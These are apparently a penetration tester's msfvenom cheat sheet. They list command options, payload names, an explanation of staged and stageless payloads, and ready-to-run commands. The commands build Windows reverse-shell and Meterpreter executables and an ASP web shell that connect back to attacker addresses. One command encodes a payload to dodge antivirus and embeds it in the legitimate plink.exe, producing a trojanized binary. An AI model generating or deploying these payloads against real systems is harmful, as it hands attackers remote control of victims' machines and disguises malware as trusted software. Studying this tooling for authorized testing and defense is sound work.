Msfvenom

Command Options

-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use

Examples of Usage

msfvenom -l payloads | grep x86
# List paylaods
msfvenom -p windows/shell_reverse_tcp --list-options
# Display paylaod options
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
#PEファイルへのinjection
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe

List of commonly used payloads

<Staged>
windows/shell/reverse_tcp
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
<Stageless>
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp
windows/x64/meterpreter_reverse_tcp

Staged vs Stageless payloads

Staged payloads are denoted with the use of a forward slash (/; e.g. windows/shell/reverse_tcp). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as multi/handler in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day)

Stageless payloads are denoted with the use of an underscore (_; e.g. windows/shell_reverse_tcp). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post here.